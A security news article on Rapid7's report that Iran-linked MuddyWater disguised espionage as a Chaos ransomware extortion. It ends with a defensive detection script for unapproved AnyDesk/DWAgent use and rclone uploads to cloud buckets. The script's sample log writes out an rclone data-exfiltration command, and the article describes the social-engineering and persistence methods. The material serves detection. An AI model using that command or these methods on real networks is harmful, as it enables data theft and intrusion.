Iranian cyber espionage disguised as a Chaos Ransomware attack

Iran-linked APT MuddyWater used ransomware-style tactics to mask espionage, combining phishing, credential theft, data exfiltration, and extortion without encryption.
A newly discovered cyber intrusion attributed to the Iran-linked APT MuddyWater (aka SeedWorm, TEMP.Zagros, Mango Sandstorm, TA450, and Static Kitten) reveals how state-sponsored attackers are increasingly leveraging ransomware tactics to disguise espionage operations. The campaign, uncovered by security researchers at Rapid7, blended social engineering, credential theft, data exfiltration, and extortion under the guise of a ransomware incident — but with no evidence of actual file encryption.
The attack unfolded in early 2026 and initially appeared to be a routine ransomware case. Victims were led to believe they were dealing with the Chaos ransomware group, which operates a leak site for stolen data. However, further investigation showed no ransomware had been deployed. Instead, the attackers relied on espionage tradecraft — lateral movement, credential harvesting, and information theft — consistent with MuddyWater’s long-standing intelligence-gathering profile.
“In early 2026, a sophisticated intrusion initially appearing to be a standard Chaos ransomware attack was assessed to be consistent with a targeted state-sponsored operation. While the threat actor operated under the banner of the Chaos ransomware-as-a-service (RaaS) group, forensic analysis revealed the incident was a ‘false flag’ masquerade,” reads the report published by Rapid7. “Technical artifacts, including a specific code-signing certificate and Command-and-Control (C2) infrastructure, suggest with moderate confidence that this activity is linked to MuddyWater (Seedworm), an Iranian Advanced Persistent Threat (APT) affiliated with the Ministry of Intelligence and Security (MOIS).”
Rapid7’s analysis shows that the threat actors gained initial access through social engineering tactics, exploiting trust in corporate communications tools. Attackers used Microsoft Teams to contact employees directly, posing as internal IT staff or business associates. Through these conversations, they persuaded users to begin screen-sharing sessions, giving the attackers direct visibility into corporate desktops and systems.
Once connected, the hackers executed reconnaissance commands, accessed files related to VPN configurations, and tricked employees into writing their credentials into locally saved text files. In at least one case, they installed the AnyDesk remote access tool to maintain a foothold in the organization’s network.
After establishing initial access, the threat actors utilized RDP sessions and DWAgent, another remote management tool, to maintain persistence. From there, they launched secondary payloads, harvested more credentials, and exfiltrated sensitive internal information.
“From there, the TA established persistence using remote access tools such as DWAgent and AnyDesk, before deploying additional payloads and further control of the environment,” reads the report. “Following this, the TA exfiltrated data from the compromised environment and subsequently contacted the victim via email, claiming data theft and initiating ransom negotiations.”

As part of the deception, MuddyWater operatives sent extortion emails to employees, claiming to have stolen confidential data and threatening to leak it unless a ransom was paid. They directed victims to the Chaos ransomware site, where the organization was indeed listed as a “new victim.”
However, when the supposed ransom “note” could not be located, the threat actors released the stolen data publicly, revealing that the true objective was data theft, not financial gain.
Rapid7 concluded that the entire ransomware scenario was a smokescreen designed to mislead defenders. “The inclusion of extortion and negotiation elements likely aimed to focus response teams on the immediate impact, delaying detection of persistence mechanisms implanted through remote access tools,” the researchers wrote.
The recent campaign spotted by Rapid7 highlights a broader trend in which nation‑state actors blend espionage with criminal aesthetics to mislead victims and deflect investigators. By adopting the look and feel of a ransomware attack, complete with fake negotiation email threads and presence on an established leak site, MuddyWater obscured its true intent: long-term infiltration and intelligence collection.
Rapid7 assessed the attribution to MuddyWater with “moderate confidence,” citing both technical overlap and contextual consistency. The researchers noted that the incident does not represent a strategic shift toward ransomware operations, but rather an evolution in deception and misdirection techniques designed to complicate attribution and response.
By masquerading as a financially motivated actor, the Iranian APT hoped to divert attention and prolong access to compromised networks. The tactic underscores how modern cyber espionage is no longer confined to covert surveillance; it now borrows the tools, language, and theatrics of cybercrime to hide in plain sight.
The episode serves as a warning to defenders: not every ransomware attack is what it seems. When state-backed adversaries like MuddyWater adopt the same playbook as criminal gangs, distinguishing espionage from extortion becomes one of cybersecurity’s most urgent challenges.
“The use of a RaaS framework in this context may enable the actor to blur distinctions between state-sponsored activity and financially motivated cybercrime, thereby complicating attribution,” concludes the report. “Furthermore, the inclusion of extortion and negotiation elements could serve to focus defensive efforts on immediate impact, likely delaying the identification of underlying persistence mechanisms established via remote access tools such as DWAgent or AnyDesk.”
The first MuddyWater campaign was observed in late 2017, when the APT group targeted entities in the Middle East.
Experts named the campaign ‘MuddyWater’ due to the difficulty in attributing a wave of attacks between February and October 2017, targeting entities in Saudi Arabia, Iraq, Israel, the United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States. Over the years, the group has evolved by adding new attack techniques to its arsenal and has also targeted European and North American countries.
The group’s victims are mainly in the telecommunications, government (IT services), and oil sectors.
In January 2022, US Cyber Command (USCYBERCOM) officially linked the MuddyWater APT group to Iran’s Ministry of Intelligence and Security (MOIS).
The MuddyWater APT has targeted several organizations in the U.S. and Canada since early February 2026. Victims include a U.S. bank, an airport, nonprofits, and a software supplier to the defense and aerospace sectors with operations in Israel. The previously unknown backdoor Dindoor relies on the Deno runtime to execute JavaScript and TypeScript code and was signed with a certificate issued to “Amy Cherne.”
The researchers also observed an attempt to exfiltrate data from a targeted software company using Rclone to a Wasabi Technologies cloud storage bucket, though it’s unclear if the transfer succeeded. The experts also spotted a separate Python backdoor, dubbed Fakeset, on U.S. airport and nonprofit networks, signed with certificates tied to Seedworm. The malware was hosted on Backblaze servers, and shared certificates with other Seedworm-linked malware families, suggesting the Iranian group was behind the intrusions.
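Both reports point defenders at the same two artifacts: a remote management tool (AnyDesk, DWAgent) appearing where IT never sanctioned it, and rclone pushing data to a cloud bucket. The following triage script is an added example, not code from Rapid7, Symantec or Security Affairs: it runs two such checks over constructed Sysmon-style process-creation events and then correlates them per host, because the persistence-plus-exfiltration pairing on one machine is what the Rapid7 report says the ransomware theatre was meant to hide. The executable names, log fields, host names, allowlist and the Wasabi-style remote are assumptions built for the example.

```python
import json
import re
from dataclasses import dataclass

# Executable names of the remote management tools named in the reporting.
# Assumed names: confirm against your own software inventory before relying on them.
REMOTE_ACCESS_TOOLS = {
    "anydesk.exe": "AnyDesk",
    "dwagent.exe": "DWAgent",
    "dwagsvc.exe": "DWAgent",
}

# Constructed allowlist: (host, tool) pairs where IT sanctioned the tool.
APPROVED_REMOTE_ACCESS = {("helpdesk-01", "AnyDesk")}

# rclone verbs that move data; listing verbs (ls, lsd) are not flagged here.
RCLONE_TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}

# A configured rclone remote looks like "name:bucket/path" (name of 2+ chars, so a
# Windows drive letter such as C:\ does not match) or ":s3:bucket" for an ad-hoc backend.
RCLONE_REMOTE_RE = re.compile(r"^:?[A-Za-z0-9_.-]{2,}:")


@dataclass
class Finding:
    host: str
    user: str
    rule: str
    detail: str


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_remote_access_tool(event: dict):
    """Flag a remote access tool starting on a host where it is not approved."""
    tool = REMOTE_ACCESS_TOOLS.get(basename(event["image"]))
    if tool is None or (event["host"], tool) in APPROVED_REMOTE_ACCESS:
        return None
    return Finding(event["host"], event["user"], "unapproved_remote_access_tool",
                   f"{tool} started from {event['image']}")


def check_rclone_cloud_transfer(event: dict):
    """Flag rclone moving data to a configured cloud remote."""
    if basename(event["image"]) not in ("rclone.exe", "rclone"):
        return None
    args = event["command_line"].split()[1:]  # drop the executable itself
    verbs = [a for a in args if a.lower() in RCLONE_TRANSFER_VERBS]
    remotes = [a for a in args if RCLONE_REMOTE_RE.match(a)]
    if not verbs or not remotes:
        return None
    return Finding(event["host"], event["user"], "rclone_cloud_transfer",
                   f"rclone {verbs[0]} to {remotes[-1]}")


CHECKS = (check_remote_access_tool, check_rclone_cloud_transfer)


def triage(log_lines):
    """Run every check over JSON-lines process events; return findings in log order."""
    findings = []
    for line in log_lines:
        if not line.strip():
            continue
        event = json.loads(line)
        for check in CHECKS:
            finding = check(event)
            if finding is not None:
                findings.append(finding)
    return findings


def priority_hosts(findings):
    """Hosts showing both an unapproved remote tool and a cloud transfer."""
    rules_by_host = {}
    for f in findings:
        rules_by_host.setdefault(f.host, set()).add(f.rule)
    wanted = {"unapproved_remote_access_tool", "rclone_cloud_transfer"}
    return sorted(h for h, rules in rules_by_host.items() if wanted <= rules)


# Constructed sample events (Sysmon-style process creation, reduced to a few fields).
SAMPLE_LOG = r'''
{"ts": "2026-02-03T09:12:04Z", "host": "helpdesk-01", "user": "it-admin", "image": "C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe", "command_line": "AnyDesk.exe"}
{"ts": "2026-02-03T10:41:19Z", "host": "ws-finance-07", "user": "jsmith", "image": "C:\\Users\\jsmith\\Downloads\\AnyDesk.exe", "command_line": "AnyDesk.exe"}
{"ts": "2026-02-04T02:07:55Z", "host": "srv-file-02", "user": "svc_backup", "image": "C:\\Program Files\\DWAgent\\dwagent.exe", "command_line": "dwagent.exe"}
{"ts": "2026-02-04T02:15:30Z", "host": "srv-file-02", "user": "svc_backup", "image": "C:\\Windows\\System32\\notepad.exe", "command_line": "notepad.exe C:\\Users\\svc_backup\\Desktop\\vpn.txt"}
{"ts": "2026-02-04T03:02:11Z", "host": "srv-file-02", "user": "svc_backup", "image": "C:\\Tools\\rclone.exe", "command_line": "rclone.exe copy C:\\Shares\\Finance wasabi:corp-archive/finance --transfers 8"}
{"ts": "2026-02-04T08:30:00Z", "host": "ws-dev-03", "user": "build", "image": "C:\\Tools\\rclone.exe", "command_line": "rclone.exe lsd wasabi:corp-archive"}
'''

if __name__ == "__main__":
    results = triage(SAMPLE_LOG.splitlines())
    for f in results:
        print(f"{f.host:14} {f.user:12} {f.rule:30} {f.detail}")
    print("priority hosts:", priority_hosts(results))
```

On the sample, the sanctioned AnyDesk on the help-desk machine is ignored, the user-downloaded AnyDesk and the DWAgent service are flagged, and only the rclone copy to the configured remote (not the `lsd` listing) counts as a transfer; srv-file-02 therefore surfaces as the one host carrying both the persistence tool and the outbound copy. The allowlist is the important design choice: these tools are legitimate software, so the signal is presence outside the approved inventory, not the binary itself.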
Recent activity linked to Iranian cyber actors shows a mix of espionage, disruption, and influence operations. The pro-Palestinian hacktivist group Handala has targeted Israeli officials and energy firms through phishing, data theft, ransomware, and leak campaigns, claiming breaches of organizations in Israel and the Gulf. Meanwhile, the Iranian APT Seedworm conducted spear-phishing attacks against academics, NGOs, and government entities to gather intelligence. Another group, Marshtreader, scanned vulnerable cameras in Israel for reconnaissance during regional tensions.
In March, the Iran-linked APT targeted U.S. organizations, deploying the new Dindoor backdoor across sectors including banks, airports, and nonprofits, Broadcom’s Symantec Threat Hunter Team revealed.
(SecurityAffairs – hacking, Iran)
